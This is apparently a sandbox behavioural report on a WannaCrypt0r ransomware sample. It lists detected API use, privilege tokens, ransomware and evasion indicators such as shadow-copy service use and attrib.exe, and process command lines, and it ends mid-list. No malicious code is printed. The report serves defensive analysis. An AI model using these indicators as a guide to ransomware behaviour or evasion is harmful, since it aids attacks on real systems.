Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Programs\Downloadly\Downloadly.exe N/A
N/A N/A C:\Users\Admin\Programs\Downloadly\Downloadly.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\Programs\Downloadly\Downloadly.exe N/A
N/A N/A C:\Users\Admin\Programs\Downloadly\Downloadly.exe N/A
N/A N/A C:\Users\Admin\Programs\Massive\Massive.exe N/A
N/A N/A C:\Users\Admin\Programs\Massive\Massive.exe N/A
N/A N/A C:\Users\Admin\Programs\Massive\Massive.exe N/A
N/A N/A C:\Users\Admin\Programs\Massive\Massive.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Windows\system32\LogonUI.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2260 wrote to memory of 3596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3976 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3976 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3884 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3884 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3884 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3884 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3884 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3884 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3884 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3884 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3884 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3884 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3884 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3884 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3884 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3884 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3884 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3884 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3884 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3884 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3884 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3884 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3884 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3884 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\sample

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xa0,0x10c,0x7ff8308e9758,0x7ff8308e9768,0x7ff8308e9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1692 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2196 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3208 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3188 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4484 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4984 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5096 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5004 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5180 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

